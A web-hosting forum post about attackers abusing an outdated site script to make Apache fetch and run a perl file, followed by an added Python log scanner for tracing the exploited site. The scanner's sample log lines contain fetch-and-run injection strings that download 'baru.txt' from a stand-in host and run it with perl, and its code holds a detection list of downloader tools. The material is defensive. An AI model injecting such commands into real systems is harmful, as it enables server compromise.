Hello,
I've been dealing with this problem on several servers for some time now. From time to time, there always seems to be some user's site that uses some outdated forum script or something, that ends up allowing a hacker to run perl script using apache.
I've done the usual thing of disabling wget and other transfer proggies. I also installed mod_security. But they still get through!
I see stuff like this in my error_log all the time:
sh: /usr/bin/wget: Permission denied
Can't open perl script "baru.txt": No such file or directory.
Use -S to search $PATH for it.
sh: /usr/bin/curl: Permission denied
Can't open perl script "baru.txt": No such file or directory.
Use -S to search $PATH for it.
sh: /usr/bin/lwp-download: Permission denied
Can't open perl script "baru.txt": No such file or directory.
Use -S to search $PATH for it.
sh: lynx: command not found
sh: fetch: command not found
sh: /usr/bin/wget: Permission denied
Can't open perl script "baru.txt": No such file or directory.
Use -S to search $PATH for it.
I just can't figure out which site is being exploited to do this. They try a bunch of things that don't work. Then eventually, I'm not sure who, they end up able to execute their code which results in apache executing a couple of perl scripts that run themselves as apache and show up as such in "ps auxww" and "top". I have to manually kill them each time.
Is there anything I can do to stop this??
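Added example, not part of the original post: one way to narrow down which site is being hit is to scan the access logs for requests whose decoded query string names the download tools and the perl call that show up in the error_log above, and count them per vhost and script. It assumes a log format with the vhost name first (%v followed by the combined fields) and that the injected command arrives in the URL (POST bodies are not logged); the sample lines, hostnames and the parameter name x are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Tool names taken from the error_log excerpt in the post.
TOOLS = ("wget", "curl", "lwp-download", "lynx", "fetch")
TOOL_RE = re.compile(r"(?<![\w-])(" + "|".join(map(re.escape, TOOLS)) + r")(?![\w-])", re.I)
PERL_RE = re.compile(r"(?<![\w-])perl\s+\S+", re.I)
# Assumed LogFormat: "%v %h %l %u %t \"%r\" %>s %b ..." (vhost first, then combined).
LINE_RE = re.compile(r'^(?P<vhost>\S+) \S+ \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+)')

# Constructed sample lines (hosts, IPs, paths and parameter names are made up).
SAMPLE = [
    'site-a.example 203.0.113.5 - - [10/Oct/2006:13:55:36 +0000] "GET /forum/index.php?action=fetch&id=3 HTTP/1.1" 200 512 "-" "-"',
    'site-b.example 203.0.113.9 - - [10/Oct/2006:13:56:01 +0000] "GET /board/view.php?x=wget%20http://files.invalid/baru.txt;perl%20baru.txt HTTP/1.1" 200 90 "-" "-"',
    'site-b.example 203.0.113.9 - - [10/Oct/2006:13:56:02 +0000] "GET /board/view.php?x=curl%2520-O%2520http://files.invalid/baru.txt%253Bperl%2520baru.txt HTTP/1.1" 200 90 "-" "-"',
]

def decode(text, rounds=3):
    """URL-decode repeatedly so double-encoded payloads are seen too."""
    for _ in range(rounds):
        new = unquote_plus(text)
        if new == text:
            break
        text = new
    return text

def suspicious(query):
    """Return downloader names found, if the query looks like a fetch-and-run chain."""
    text = decode(query)
    tools = {t.lower() for t in TOOL_RE.findall(text)}
    # One tool name alone (e.g. action=fetch) is too common to flag.
    if len(tools) >= 2 or (tools and PERL_RE.search(text)):
        return sorted(tools)
    return []

def scan(lines):
    """Count suspicious requests per (vhost, script path)."""
    hits = Counter()
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            path, _, query = m.group("target").partition("?")
            if suspicious(query):
                hits[(m.group("vhost"), path)] += 1
    return hits

if __name__ == "__main__":
    for (vhost, path), n in scan(SAMPLE).most_common():
        print(f"{n:5d}  {vhost}  {path}")
```

To run it on real logs, pass an open file instead of SAMPLE, for example scan(open(path, errors="replace")).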